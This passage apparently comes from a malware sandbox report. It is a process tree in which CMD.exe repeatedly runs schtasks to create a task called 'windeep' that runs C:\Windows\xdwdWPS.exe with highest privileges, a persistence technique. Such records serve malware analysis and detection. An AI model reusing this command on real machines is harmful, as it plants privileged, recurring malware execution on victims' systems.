- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4800
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2844
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:892
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1676
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1796
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4188
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4012
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4036
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4564
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:228
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3940
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2972
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2500
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3464
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2496
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3108
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1640
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1068
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3648
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1676
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4848
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4052
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4668
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3656
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1348
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:476
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4708
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3180
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:648
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3628
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3584
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4248
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3200
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2824
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4628
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:5084
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2164
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1776
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4852
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1380
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1604
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1728
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4252
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2200
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4736
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1556
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3648
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4876
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1256
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3704
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1064
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3424
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1088
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3204
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:652
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3848
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4360
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1540
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4456
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:408
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3156
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1768
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4524
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2204
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4668
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1596
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3148
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2112
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3832
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1876
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2560
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3012
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4268
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4656
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2744
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1540
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4696
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1888
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:5064
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4252
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3596
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:8
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4900
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4756
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2380
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2792
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2204
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1416
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3028
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2280
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1108
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1844
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1096
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2320
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4476
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2100
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2308
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2804
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4240
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1748
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4560
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3200
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1368
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1744
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3796
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4756
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4524
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2416
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4428
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1620
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1796
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1740
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1104
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3920
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:936
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4348
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2516
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1352
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1928
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4588
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4492
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:568
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2412
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:724
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2164
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1956
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4464
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2208
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2364
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:1856
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3568
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4472
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1772
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4012
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4876
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4844
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4920
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4248
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2740
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2932
